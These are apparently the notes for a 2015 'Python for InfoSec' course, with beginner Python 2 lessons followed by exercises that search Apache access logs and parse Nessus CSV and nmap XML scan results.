1 | Here is the Day 1 Video: | |
2 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_5_rec-lw-us-4_240269_recording.mp4 | |
3 | ||
4 | Here is the Day 2 Video: | |
5 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_7_rec-hq-3_241310_recording.mp4 | |
6 | ||
7 | Here is the Day 3 Video: | |
8 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_11_rec-lw-us-7_243144_recording.mp4 | |
9 | ||
10 | Here is the Day 4 Video: | |
11 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_14_rec-hq-6_244377_recording.mp4 | |
12 | ||
13 | Here is the Day 5 Video: | |
14 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_18_rec-hq-6_246395_recording.mp4 | |
15 | ||
16 | Here is the Day 6 Video: | |
17 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_5_20_rec-hq-2_247633_recording.mp4 | |
18 | ||
19 | ||
20 | ######################################### | |
21 | # Here is the courseware for this month # | |
22 | ######################################### | |
23 | ||
24 | Class powerpoint slides: | |
25 | https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx | |
26 | ||
27 | ||
28 | ||
29 | Courseware Lab Manual | |
30 | https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf | |
31 | ||
32 | ||
33 | ||
34 | https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip | |
username: strategicsec
password: strategicsec   (lab-only default credentials that ship with the VM - everyone who reads this page knows them, so change the password on first login and keep the VM on a host-only/isolated network rather than a routable one)
37 | ||
38 | ||
39 | The youtube video playlist that I'd like for you to watch is located here: | |
40 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA | |
41 | ||
42 | ||
43 | ############################## | |
44 | # Installing Python in Linux # | |
45 | ############################## | |
The first thing that you will need to do is install IDLE, the Python editor/shell used for the lessons below (the command installs IDLE and the Python interpreter it depends on; despite the original wording it does not install dpkt).
47 | ||
48 | sudo apt-get install -y idle | |
49 | ||
50 | Open IDLE, and let's just dive right in. | |
51 | ||
52 | ||
53 | ||
54 | ||
55 | ############################# | |
56 | # Lesson 1: Simple Printing # | |
57 | ############################# | |
58 | ||
59 | >>> print "Today we are learning Python." | |
60 | ||
61 | ||
62 | ||
63 | ||
64 | ||
65 | ||
66 | ##################################### | |
67 | # Lesson 2: Simple Numbers and Math # | |
68 | ##################################### | |
69 | ||
70 | >>> 2+2 | |
71 | ||
72 | >>> 6-3 | |
73 | ||
74 | >>> 18/7 | |
75 | ||
76 | >>> 18.0/7 | |
77 | ||
78 | >>> 18.0/7.0 | |
79 | ||
80 | >>> 18/7 | |
81 | ||
82 | >>> 9%4 | |
83 | ||
84 | >>> 8%4 | |
85 | ||
86 | >>> 8.75%.5 | |
87 | ||
88 | >>> 6.*7 | |
89 | ||
90 | >>> 6*6*6 | |
91 | ||
92 | >>> 6**3 | |
93 | ||
94 | >>> 5**12 | |
95 | ||
96 | >>> -5**4 | |
97 | ||
98 | ||
99 | ||
100 | ||
101 | ||
102 | ||
103 | ####################### | |
104 | # Lesson 3: Variables # | |
105 | ####################### | |
106 | ||
107 | >>> x=18 | |
108 | ||
109 | >>> x+15 | |
110 | ||
111 | >>> x**3 | |
112 | ||
113 | >>> y=54 | |
114 | ||
115 | >>> x+y | |
116 | ||
117 | >>> g=input("Enter number here: ") | |
118 | 43 | |
119 | ||
120 | >>> g+32 | |
121 | ||
122 | >>> g**3 | |
123 | ||
124 | ||
125 | ||
126 | ||
127 | ||
128 | ||
129 | ||
130 | ||
131 | ################################### | |
132 | # Lesson 4: Modules and Functions # | |
133 | ################################### | |
134 | ||
135 | >>> 5**4 | |
136 | ||
137 | >>> pow(5,4) | |
138 | ||
139 | >>> abs(-18) | |
140 | ||
141 | >>> abs(5) | |
142 | ||
143 | >>> floor(18.7) | |
144 | ||
145 | >>> import math | |
146 | ||
147 | >>> math.floor(18.7) | |
148 | ||
149 | >>> math.sqrt(81) | |
150 | ||
151 | >>> joe = math.sqrt | |
152 | ||
153 | >>> joe(9) | |
154 | ||
155 | >>> joe=math.floor | |
156 | ||
157 | >>> joe(19.8) | |
158 | ||
159 | ||
160 | ||
161 | ||
162 | ||
163 | ||
164 | ||
165 | ################################## | |
166 | # Lesson 5: How to Save Programs # | |
167 | ################################## | |
168 | Run "IDLE (Python GUI)" | |
169 | ||
170 | File -> New Window | |
171 | ||
172 | print "Python for InfoSec" | |
173 | ||
174 | File -> Save as | |
175 | py4InfoSec.py | |
176 | ||
177 | Run -> Run Module or Press "F5" | |
178 | ||
179 | ||
180 | ||
181 | ||
182 | ||
183 | Create a file name.py | |
184 | ||
# raw_input() returns exactly what was typed, as a string - it never evaluates it
x = raw_input("Enter name: ")
print "Hey " + x
# a second prompt keeps the program open until Enter is pressed, so the greeting stays visible
raw_input("Press<enter>")
188 | ||
189 | ||
190 | Run -> Run Module or Press "F5" | |
191 | ||
192 | ||
193 | ||
194 | ||
195 | ||
196 | ||
197 | ||
198 | ||
199 | ##################### | |
200 | # Lesson 6: Strings # | |
201 | ##################### | |
202 | ||
203 | >>> "XSS" | |
204 | ||
205 | >>> 'SQLi' | |
206 | ||
207 | >>> "Joe's a python lover" | |
208 | ||
209 | >>> 'Joe\'s a python lover' | |
210 | ||
211 | >>> "Joe said \"InfoSec is fun\" to me" | |
212 | ||
213 | >>> a = "Joe" | |
214 | ||
215 | >>> b = "McCray" | |
216 | ||
217 | >>> a, b | |
218 | ||
219 | >>> a+b | |
220 | ||
221 | ||
222 | ||
223 | ||
224 | ||
225 | ||
226 | ||
227 | ||
228 | ########################## | |
229 | # Lesson 7: More Strings # | |
230 | ########################## | |
231 | ||
232 | >>> num = 10 | |
233 | ||
234 | >>> num + 2 | |
235 | ||
236 | >>> "The number of open ports found on this system is " + num | |
237 | ||
238 | >>> num = str(18) | |
239 | ||
240 | >>> "There are " + num + " vulnerabilities found in this environment." | |
241 | ||
242 | >>> num2 = 46 | |
243 | ||
244 | >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2` | |
245 | ||
246 | ||
247 | ||
248 | ||
249 | ||
250 | ||
251 | ||
252 | ||
253 | ####################### | |
254 | # Lesson 8: Raw Input # | |
255 | ####################### | |
256 | Run "IDLE (Python GUI)" | |
257 | ||
258 | File -> New Window | |
259 | ||
# Python 2 input() is eval(raw_input()): the typed text is evaluated as a Python expression,
# so typing a name that is not a defined variable raises NameError. Because it evaluates
# arbitrary expressions it must never be used on anything an untrusted user can type.
joemccray=input("Enter name: ")
print joemccray
262 | ||
263 | ||
264 | ||
265 | Run -> Run Module # Will throw an error | |
266 | or | |
267 | Press "F5" | |
268 | ||
269 | File -> New Window | |
270 | joemccray=raw_input("Enter name: ") | |
271 | ||
Run -> Run Module # This version runs without an error: raw_input() hands back whatever was typed as a plain string
273 | ||
274 | or | |
275 | ||
276 | Press "F5" | |
277 | ||
278 | NOTE: | |
NOTE: In Python 2, input() is shorthand for eval(raw_input()): whatever is typed is evaluated as a Python expression, which is why a bare name throws the error above - and why it must never be used on anything an untrusted user can type, since an expression can import modules and run commands. Prefer raw_input() everywhere and convert the string yourself (int(raw_input(...))) when you need a number. In Python 3, input() returns a plain string, like Python 2's raw_input().
280 | ||
281 | ||
282 | ||
283 | ||
284 | ||
285 | ||
286 | ||
287 | ################################# | |
288 | # Lesson 9: Sequences and Lists # | |
289 | ################################# | |
290 | ||
291 | >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
292 | ||
293 | >>> attacks | |
294 | ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include'] | |
295 | ||
296 | >>> attacks[3] | |
297 | 'SQL Injection' | |
298 | ||
299 | >>> attacks[-2] | |
300 | 'Cross-Site Scripting' | |
301 | ||
302 | ||
303 | ||
304 | ||
305 | ||
306 | ||
###########################
# Lesson 10: If Statement #
###########################
310 | Run "IDLE (Python GUI)" | |
311 | ||
312 | File -> New Window | |
attack="SQLI"
# == is an exact, case-sensitive comparison: "sqli" or "SQLi" would not match
if attack=="SQLI":
    print 'The attacker is using SQLI'
316 | ||
317 | ||
318 | ||
319 | Run -> Run Module or Press "F5" | |
320 | ||
321 | File >> New Window | |
attack="XSS"
# the condition is false here, so the if body never runs and nothing is printed
if attack=="SQLI":
    print 'The attacker is using SQLI'
325 | ||
326 | ||
327 | Run -> Run Module or Press "F5" | |
328 | ||
329 | ||
330 | ||
331 | ############################# | |
332 | # Reference Videos To Watch # | |
333 | ############################# | |
334 | Here is your first set of youtube videos that I'd like for you to watch: | |
335 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10) | |
336 | ||
337 | ||
338 | ||
339 | ||
340 | ||
341 | ##################################### | |
# Lesson 11: Intro to Log Analysis  #
343 | ##################################### | |
344 | ||
345 | Login to your StrategicSec Ubuntu machine. You can download the VM from the following link: | |
346 | ||
347 | https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip | |
username: strategicsec
password: strategicsec   (published lab-only defaults - change the password on first login and keep the VM off any routable/untrusted network)
350 | ||
351 | Then execute the following commands: | |
352 | --------------------------------------------------------------------------------------------------------- | |
353 | ||
354 | ||
355 | wget https://s3.amazonaws.com/SecureNinja/Python/access_log | |
356 | ||
357 | ||
358 | cat access_log | grep 141.101.80.188 | |
359 | ||
360 | cat access_log | grep 141.101.80.187 | |
361 | ||
362 | cat access_log | grep 108.162.216.204 | |
363 | ||
364 | cat access_log | grep 173.245.53.160 | |
365 | ||
366 | --------------------------------------------------------- | |
367 | ||
368 | Google the following terms: | |
369 | - Python read file | |
370 | - Python read line | |
371 | - Python read from file | |
372 | ||
373 | ||
374 | ||
375 | ||
376 | ######################################################### | |
# Lesson 12: Use Python to read in a file line by line  #
378 | ######################################################### | |
379 | ||
380 | ||
381 | Reference: | |
382 | http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/ | |
383 | ||
384 | ||
385 | ||
386 | --------------------------------------------------------- | |
387 | vi logread1.py | |
388 | ||
389 | ||
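## Open the file read-only. The with-block closes it even if readlines() raises;
## a plain open()/close() pair leaks the handle whenever the read fails part-way.
with open('access_log', "r") as f:
    ## readlines() returns a list with one element per line (the trailing "\n" is kept)
    lines = f.readlines()

## this prints the list's repr, not the log text - fine for seeing the data structure
print(lines)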
402 | ||
403 | --------------------------------------------------------- | |
404 | ||
405 | ||
406 | Google the following: | |
407 | - python difference between readlines and readline | |
408 | - python readlines and readline | |
409 | ||
410 | ||
411 | ||
412 | ||
413 | ||
414 | ################################# | |
# Lesson 13: A quick challenge  #
416 | ################################# | |
417 | ||
Can you write an if/then statement that looks for this IP in the log and prints "Found it"?
419 | ||
420 | ||
421 | 141.101.81.187 | |
422 | ||
423 | ||
424 | ||
425 | ||
426 | ||
427 | ||
428 | --------------------------------------------------------- | |
429 | Hint 1: Use Python to look for a value in a list | |
430 | ||
431 | Reference: | |
432 | http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html | |
433 | ||
434 | ||
435 | ||
436 | ||
437 | --------------------------------------------------------- | |
438 | Hint 2: Use Python to prompt for user input | |
439 | ||
440 | Reference: | |
441 | http://www.cyberciti.biz/faq/python-raw_input-examples/ | |
442 | ||
443 | ||
444 | ||
445 | ||
446 | --------------------------------------------------------- | |
447 | Hint 3: Use Python to search for a string in a list | |
448 | ||
449 | Reference: | |
450 | http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string | |
451 | ||
452 | ||
453 | ||
454 | ||
Here is one student's solution - can you please explain this code to me?
456 | ||
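#!/usr/bin/python
"""Print every access_log line whose leading field (the client IP) equals the IP typed by the user."""


def client_ip(line):
    """Return the text before the first ' - ' of an access_log line.

    In Apache's common/combined log format that is the client address. A line
    without ' - ' is returned whole, so it simply never equals an IP.
    """
    return line.split(" - ")[0]


if __name__ == '__main__':
    strUsrinput = raw_input("Enter IP Address: ")
    # the with-block closes the log even if the loop raises; iterating the file
    # object reads one line at a time instead of loading the whole log into memory
    with open('access_log') as f:
        for line in f:
            # exact match on the first field: "10.0.0.1" does not match "10.0.0.10"
            if client_ip(line) == strUsrinput:
                print(line)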
469 | ||
470 | ||
471 | ||
472 | ||
473 | ------------------------------- | |
474 | ||
475 | Working with another student after class we came up with another solution: | |
476 | ||
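#!/usr/bin/env python
"""Print every access_log line that contains the text the user typed."""


def lines_containing(lines, needle):
    """Return the lines in `lines` that contain `needle` anywhere.

    This is a substring test, not an IP comparison: searching for 10.0.0.1 also
    returns 10.0.0.10, 10.0.0.1xx and any line where the text appears in the
    URL or User-Agent. Compare the first field exactly when the result feeds
    a block list or a report.
    """
    return [line for line in lines if needle in line]


if __name__ == '__main__':
    # the with-block closes the log file even if something below raises
    with open('access_log', "r") as f:
        # one list element per log line, newline included
        lines = f.readlines()

    userinput = raw_input("Enter the IP you want to search for: ")

    for line in lines_containing(lines, userinput):
        print(line)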
496 | ||
497 | ||
498 | ||
499 | ################################################## | |
# Lesson 14: Look for web attacks in a log file  #
501 | ################################################## | |
502 | ||
In this lab we will look at the scan_log.py script, which scans an Apache access log for the signatures of common web attacks. Read the script before you run it (the cat | less step below): it is downloaded code, and you should know what it does before pointing it at a real log.
504 | Supported attacks: | |
505 | 1. SQL Injection | |
506 | 2. Local File Inclusion | |
507 | 3. Remote File Inclusion | |
508 | 4. Cross-Site Scripting | |
509 | ||
510 | ||
511 | ||
512 | wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py | |
513 | ||
514 | The usage for scan_log.py is simple. You feed it an apache log file. | |
515 | ||
516 | cat scan_log.py | less (use your up/down arrow keys to look through the file) | |
517 | ||
518 | Explain to me how this script works. | |
519 | ||
520 | ||
521 | ||
522 | ################################ | |
523 | # Lesson 15: Parsing CSV Files # | |
524 | ################################ | |
525 | ||
526 | Dealing with csv files | |
527 | ||
528 | Reference: | |
529 | http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/ | |
530 | ||
531 | Type the following commands: | |
532 | --------------------------------------------------------------------------------------------------------- | |
533 | ||
534 | wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv | |
535 | ||
536 | ||
537 | Example 1 - Reading CSV files | |
538 | ----------------------------- | |
#To be able to read csv formatted files, we will first have to import the
#csv module.


import csv
# 'rb' is the Python 2 idiom for the csv module; the with-block closes the file on exit
with open('class_nessus.csv', 'rb') as f:
    reader = csv.reader(f)
    # each row comes back as a list of strings, one per column
    for row in reader:
        print row
548 | ||
549 | ||
550 | ||
551 | ||
552 | ||
553 | ||
554 | Example 2 - Reading CSV files | |
555 | ----------------------------- | |
556 | vi readcsv.py | |
557 | ||
558 | ||
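#!/usr/bin/python
"""Print every row of the CSV file named on the command line, one Python list per row."""
import csv  # handles quoting and embedded commas, which a plain split(',') would not
import sys  # command-line arguments


def parse_rows(lines):
    """Return a csv reader over an iterable of CSV text lines (an open file object will do)."""
    return csv.reader(lines)


def main(argv):
    """Entry point: argv[1] is the CSV path; a missing argument gives a usage line, not an IndexError."""
    if len(argv) != 2:
        sys.exit('usage: %s <file.csv>' % argv[0])
    # 'rb' is the Python 2 csv idiom; the with-block closes the file even if parsing raises
    with open(argv[1], 'rb') as f:
        for row in parse_rows(f):
            print(row)


if __name__ == '__main__':
    main(sys.argv)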
570 | ||
571 | ||
572 | ||
573 | ||
574 | ||
575 | ||
576 | Example 3 - - Reading CSV files | |
577 | ------------------------------- | |
578 | vi readcsv2.py | |
579 | ||
580 | ||
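#!/usr/bin/python
"""Print class_nessus.csv as 'column: value' lines, labelling every field with the header row's name."""
import csv

CSV_FILE = 'class_nessus.csv'


def labelled_fields(header, row):
    """Pair each value in `row` with its column name from `header` as '%-8s: %s' strings.

    zip() stops at the shorter sequence: a row with more fields than the header
    loses the extras and a shorter row yields fewer lines - neither raises.
    """
    return ['%-8s: %s' % (name, value) for name, value in zip(header, row)]


def main():
    # 'rb' is the Python 2 csv idiom; the with-block closes the file even if parsing raises
    with open(CSV_FILE, 'rb') as ifile:
        reader = csv.reader(ifile)
        # the first row names the columns; an empty file has nothing to print
        header = next(reader, None)
        if header is None:
            return
        for row in reader:
            for line in labelled_fields(header, row):
                print(line)


if __name__ == '__main__':
    main()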
604 | ||
605 | ||
606 | ||
607 | ||
608 | ||
609 | ||
610 | ||
611 | ||
612 | python readcsv2.py | less | |
613 | ||
614 | ||
615 | ||
616 | ||
617 | ||
618 | ||
619 | ||
620 | ||
621 | /---------------------------------------------------/ | |
622 | --------------------PARSING CSV FILES---------------- | |
623 | /---------------------------------------------------/ | |
624 | ||
625 | -------------TASK 1------------ | |
626 | vi readcsv3.py | |
627 | ||
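#!/usr/bin/python
"""Print the Risk/Host/Protocol/Port columns of every High-risk finding in a Nessus CSV export."""
import csv

CSV_FILE = 'class_nessus.csv'
# index 3 is compared against 'high', so it is presumably the Risk column; 4-6 are printed
# alongside it (Host/Protocol/Port in a Nessus export - TODO confirm against the header row)
RISK, HOST, PROTOCOL, PORT = 3, 4, 5, 6


def findings_by_risk(rows, levels=('high',)):
    """Yield (header, row) for each data row whose risk column matches one of `levels`.

    `rows` is an iterable of field lists whose first element is the header.
    Matching is case-insensitive. Rows too short to print (blank or truncated
    lines) are skipped instead of raising IndexError.
    NOTE(review): Nessus also rates findings 'Critical'; the default leaves
    those out - pass levels=('critical', 'high') to include them.
    """
    wanted = tuple(level.lower() for level in levels)
    rows = iter(rows)
    header = next(rows, None)
    if header is None:
        return
    for row in rows:
        if len(row) > PORT and row[RISK].lower() in wanted:
            yield header, row


def format_finding(header, row):
    """Render one finding as 'Risk: X Host: Y Protocol: Z Port: W', using the header's own labels."""
    return '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (
        header[RISK], row[RISK], header[HOST], row[HOST],
        header[PROTOCOL], row[PROTOCOL], header[PORT], row[PORT])


def main():
    # 'rb' is the Python 2 csv idiom; the with-block replaces the try/finally close
    with open(CSV_FILE, 'rb') as f:
        for header, row in findings_by_risk(csv.reader(f)):
            print(format_finding(header, row))


if __name__ == '__main__':
    main()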
645 | ||
646 | ||
647 | ||
648 | ||
649 | ||
650 | python readcsv3.py | less | |
651 | ||
652 | -------------TASK 2------------ | |
653 | vi readcsv4.py | |
654 | ||
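#!/usr/bin/python
"""Print one High-risk finding per host from a Nessus CSV export - a list of affected hosts rather than of findings."""
import csv

CSV_FILE = 'class_nessus.csv'
# index 3 is compared against 'high', so it is presumably the Risk column; 4-6 are printed
# alongside it (Host/Protocol/Port in a Nessus export - TODO confirm against the header row)
RISK, HOST, PROTOCOL, PORT = 3, 4, 5, 6


def first_finding_per_host(rows, levels=('high',)):
    """Yield (header, row) for the first row of each host whose risk column matches one of `levels`.

    `rows` is an iterable of field lists starting with the header. Matching is
    case-insensitive; rows too short to print are skipped rather than raising.
    A host is reported at most once, with its earliest matching finding.
    NOTE(review): 'Critical' findings are not 'high' - pass
    levels=('critical', 'high') to count those hosts as well.
    """
    wanted = tuple(level.lower() for level in levels)
    seen = set()  # hosts already reported; a set gives O(1) membership tests
    rows = iter(rows)
    header = next(rows, None)
    if header is None:
        return
    for row in rows:
        if len(row) <= PORT or row[RISK].lower() not in wanted:
            continue
        if row[HOST] not in seen:
            seen.add(row[HOST])
            yield header, row


def format_finding(header, row):
    """Render one finding as 'Risk: X Host: Y Protocol: Z Port: W', using the header's own labels."""
    return '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (
        header[RISK], row[RISK], header[HOST], row[HOST],
        header[PROTOCOL], row[PROTOCOL], header[PORT], row[PORT])


def main():
    print('/---------------------------------------------------/')
    # 'rb' is the Python 2 csv idiom; the with-block replaces the try/finally close
    with open(CSV_FILE, 'rb') as f:
        for header, row in first_finding_per_host(csv.reader(f)):
            print(format_finding(header, row))


if __name__ == '__main__':
    main()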
675 | ||
676 | ||
677 | python readcsv4.py | less | |
678 | ||
679 | ||
680 | ||
681 | ||
682 | ||
683 | ################################ | |
684 | # Lesson 16: Parsing XML Files # | |
685 | ################################ | |
686 | ||
687 | /---------------------------------------------------/ | |
688 | --------------------PARSING XML FILES---------------- | |
689 | /---------------------------------------------------/ | |
690 | ||
691 | ||
692 | Type the following commands: | |
693 | --------------------------------------------------------------------------------------------------------- | |
694 | ||
695 | wget https://s3.amazonaws.com/SecureNinja/Python/samplescan.xml | |
696 | ||
697 | wget https://s3.amazonaws.com/SecureNinja/Python/application.xml | |
698 | ||
699 | wget https://s3.amazonaws.com/SecureNinja/Python/security.xml | |
700 | ||
701 | wget https://s3.amazonaws.com/SecureNinja/Python/system.xml | |
702 | ||
703 | wget https://s3.amazonaws.com/SecureNinja/Python/sc_xml.xml | |
704 | ||
705 | ||
706 | ||
707 | -------------TASK 1------------ | |
708 | vi readxml1.py | |
709 | ||
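#!/usr/bin/python
"""Print the hostname and OS match of every host an nmap XML scan fingerprints as Windows XP."""
from xml.dom import minidom

SCAN_FILE = 'sc_xml.xml'


def first_attr(parent, tag, attr, default=''):
    """Return attribute `attr` of the first `tag` element under `parent`, or `default` when either is missing."""
    elements = parent.getElementsByTagName(tag)
    if not elements:
        return default
    return elements[0].getAttribute(attr) or default


def hostname_of(host):
    """Name from the first <hostname> under a <host>; a host without one gets a placeholder."""
    return first_attr(host, 'hostname', 'name', 'Unable to find Hostname')


def matching_os_hosts(xmldoc, osfamily='Windows', osgen='XP'):
    """Yield (hostname, osmatch name) for each host with an <osclass> of the given family and generation.

    Each host is reported once even when several <osclass> entries match, and
    the osmatch name falls back to 'Unknown OS' when the host has no <osmatch>.
    """
    for host in xmldoc.getElementsByTagName('host'):
        for osclass in host.getElementsByTagName('osclass'):
            if osclass.getAttribute('osfamily') == osfamily and osclass.getAttribute('osgen') == osgen:
                yield hostname_of(host), first_attr(host, 'osmatch', 'name', 'Unknown OS')
                break


def main():
    # NOTE(review): minidom/expat expands entity references, so a scan file from an
    # untrusted source can trigger an entity-expansion (billion laughs) memory blow-up;
    # parse such files with the defusedxml package instead.
    xmldoc = minidom.parse(SCAN_FILE)
    # Search from the Document rather than xmldoc.firstChild: with a DOCTYPE or an
    # xml-stylesheet instruction ahead of <nmaprun>, firstChild is not the root element.
    for hostname, osname in matching_os_hosts(xmldoc):
        print('%-8s: %s -> %-8s: %s' % ('Host', hostname, 'OS', osname))


if __name__ == '__main__':
    main()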
729 | ||
730 | ||
731 | ||
732 | ||
733 | ||
734 | -------------TASK 2------------ | |
735 | vi readxml2.py | |
736 | ||
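#!/usr/bin/python
"""Print every host in an nmap XML scan that has TCP port 22 open."""
from xml.dom import minidom

SCAN_FILE = 'sc_xml.xml'
PORT = '22'
PROTOCOL = 'tcp'


def first_attr(parent, tag, attr, default=''):
    """Return attribute `attr` of the first `tag` element under `parent`, or `default` when either is missing."""
    elements = parent.getElementsByTagName(tag)
    if not elements:
        return default
    return elements[0].getAttribute(attr) or default


def hostname_of(host):
    """Name from the first <hostname> under a <host>; a host without one gets a placeholder."""
    return first_attr(host, 'hostname', 'name', 'Unable to find Hostname')


def has_open_port(host, portid=PORT, protocol=PROTOCOL):
    """True when the host has a <port> of this protocol/id whose <state> is exactly 'open'.

    A host without a <ports> element (e.g. one nmap found down) simply yields False.
    """
    for port in host.getElementsByTagName('port'):
        if port.getAttribute('portid') == portid and port.getAttribute('protocol') == protocol:
            if first_attr(port, 'state', 'state') == 'open':
                return True
    return False


def hosts_with_open_port(xmldoc, portid=PORT, protocol=PROTOCOL):
    """Yield the hostname of every host in the scan with the port open."""
    for host in xmldoc.getElementsByTagName('host'):
        if has_open_port(host, portid, protocol):
            yield hostname_of(host)


def main():
    # NOTE(review): minidom/expat expands entity references; for scan files from an
    # untrusted source use the defusedxml package to avoid entity-expansion blow-ups.
    xmldoc = minidom.parse(SCAN_FILE)
    # searching from the Document avoids assuming firstChild is <nmaprun> (it is the
    # DOCTYPE or a processing instruction when one precedes the root element)
    for hostname in hosts_with_open_port(xmldoc):
        print('%-8s: %s -> %-8s: %s' % ('Host', hostname, 'Ports', 'open : %s : %s' % (PROTOCOL, PORT)))


if __name__ == '__main__':
    main()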
757 | ||
758 | ||
759 | ||
760 | ||
761 | -------------TASK 3------------ | |
762 | vi readxml3.py | |
763 | ||
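#!/usr/bin/python
"""Print every host in an nmap XML scan with an open web port, naming the first of TCP 80/443 found open."""
from xml.dom import minidom

SCAN_FILE = 'sc_xml.xml'
WEB_PORTS = ('80', '443')
PROTOCOL = 'tcp'


def first_attr(parent, tag, attr, default=''):
    """Return attribute `attr` of the first `tag` element under `parent`, or `default` when either is missing."""
    elements = parent.getElementsByTagName(tag)
    if not elements:
        return default
    return elements[0].getAttribute(attr) or default


def hostname_of(host):
    """Name from the first <hostname> under a <host>; a host without one gets a placeholder."""
    return first_attr(host, 'hostname', 'name', 'Unable to find Hostname')


def first_open_port(host, portids=WEB_PORTS, protocol=PROTOCOL):
    """Return the id of the first <port> (in document order) of `protocol`, listed in `portids`, whose state is exactly 'open'; None when there is none."""
    for port in host.getElementsByTagName('port'):
        if port.getAttribute('protocol') == protocol and port.getAttribute('portid') in portids:
            if first_attr(port, 'state', 'state') == 'open':
                return port.getAttribute('portid')
    return None


def hosts_with_web_port(xmldoc, portids=WEB_PORTS, protocol=PROTOCOL):
    """Yield (hostname, portid) once per host that has one of the ports open."""
    for host in xmldoc.getElementsByTagName('host'):
        portid = first_open_port(host, portids, protocol)
        if portid is not None:
            yield hostname_of(host), portid


def main():
    # NOTE(review): minidom/expat expands entity references; for scan files from an
    # untrusted source use the defusedxml package to avoid entity-expansion blow-ups.
    xmldoc = minidom.parse(SCAN_FILE)
    for hostname, portid in hosts_with_web_port(xmldoc):
        print('%-8s: %s -> %-8s: %s' % ('Host', hostname, 'Ports', 'open : %s : %s' % (PROTOCOL, portid)))


if __name__ == '__main__':
    main()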
787 | ||
788 | ||
789 | ||
790 | ||
791 | -------------TASK 4------------ | |
792 | vi readxml4.py | |
793 | ||
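#!/usr/bin/python
"""List hosts in one network that expose SSH together with a web port, from an nmap XML scan.

For every host with an IPv4 address under NET_PREFIX the script looks for an
open TCP SSH port and, if there is one, for an open TCP 80 or 443, and prints
the hostname, the IP and both ports.
"""
from xml.dom import minidom

SCAN_FILE = 'sc_xml.xml'
NET_PREFIX = '10.57.'          # plain string prefix of the dotted address, e.g. '10.57.' or '192.168.1.'
SSH_PORTS = ('22',)            # exact port ids; add '2222' to also catch SSH on the common alternate port
WEB_PORTS = ('80', '443')


def first_attr(parent, tag, attr, default=''):
    """Return attribute `attr` of the first `tag` element under `parent`, or `default` when either is missing."""
    elements = parent.getElementsByTagName(tag)
    if not elements:
        return default
    return elements[0].getAttribute(attr) or default


def hostname_of(host):
    """Name from the first <hostname> under a <host>; a host without one gets a placeholder."""
    return first_attr(host, 'hostname', 'name', 'Unable to find Hostname')


def ipv4_of(host, prefix):
    """Return the host's first <address addrtype="ipv4"> whose addr starts with `prefix`, or None."""
    for address in host.getElementsByTagName('address'):
        addr = address.getAttribute('addr')
        if address.getAttribute('addrtype') == 'ipv4' and addr.startswith(prefix):
            return addr
    return None


def tcp_port_states(host):
    """Map portid -> state text for every <port protocol="tcp"> of the host ('' when <state> is missing)."""
    states = {}
    for port in host.getElementsByTagName('port'):
        if port.getAttribute('protocol') == 'tcp':
            states[port.getAttribute('portid')] = first_attr(port, 'state', 'state')
    return states


def ssh_and_web(host, ssh_ports=SSH_PORTS, web_ports=WEB_PORTS):
    """Return (ssh_state, ssh_port, web_port) when the host has both, else None.

    SSH counts when its state starts with 'open' - nmap reports 'open|filtered'
    when it cannot tell the two apart - while the web port must be exactly
    'open'. The first entry of each tuple that qualifies is the one reported.
    """
    states = tcp_port_states(host)
    ssh = [(states[p], p) for p in ssh_ports if states.get(p, '').startswith('open')]
    web = [p for p in web_ports if states.get(p) == 'open']
    if not ssh or not web:
        return None
    return ssh[0][0], ssh[0][1], web[0]


def exposed_hosts(xmldoc, prefix=NET_PREFIX):
    """Yield (hostname, ip, ssh_state, ssh_port, web_port) for each host under `prefix` with SSH and a web port."""
    for host in xmldoc.getElementsByTagName('host'):
        ip = ipv4_of(host, prefix)
        if ip is None:
            continue
        found = ssh_and_web(host)
        if found is not None:
            yield (hostname_of(host), ip) + found


def main():
    # NOTE(review): minidom/expat expands entity references; for scan files from an
    # untrusted source use the defusedxml package to avoid entity-expansion blow-ups.
    xmldoc = minidom.parse(SCAN_FILE)
    for hostname, ip, ssh_state, ssh_port, web_port in exposed_hosts(xmldoc):
        print('%-8s: %s -> %-8s: %s -> %-8s: %s' % (
            'Host', hostname, 'IP', ip,
            'Ports', ssh_state + ' : tcp : ' + ssh_port + ' and open : tcp : ' + web_port))


if __name__ == '__main__':
    main()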
834 | ||
835 | ||
836 | ||
837 | ################################ | |
838 | # Lesson 17: Parsing EVTX Logs # | |
839 | ################################ | |
840 | /---------------------------------------------------/ | |
841 | --------------------PARSING EVTX FILES---------------- | |
842 | /---------------------------------------------------/ | |
843 | ||
844 | ||
845 | Type the following commands: | |
846 | --------------------------------------------------------------------------------------------------------- | |
847 | ||
848 | wget https://s3.amazonaws.com/SecureNinja/Python/Program-Inventory.evtx | |
849 | ||
850 | wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Application.evtx | |
851 | ||
852 | wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_Security.evtx | |
853 | ||
854 | wget https://s3.amazonaws.com/SecureNinja/Python/WIN-M751BADISCT_System.evtx | |
855 | ||
856 | ||
857 | ||
858 | ||
859 | -------------TASK 1------------ | |
860 | vi readevtx1.py | |
861 | ||
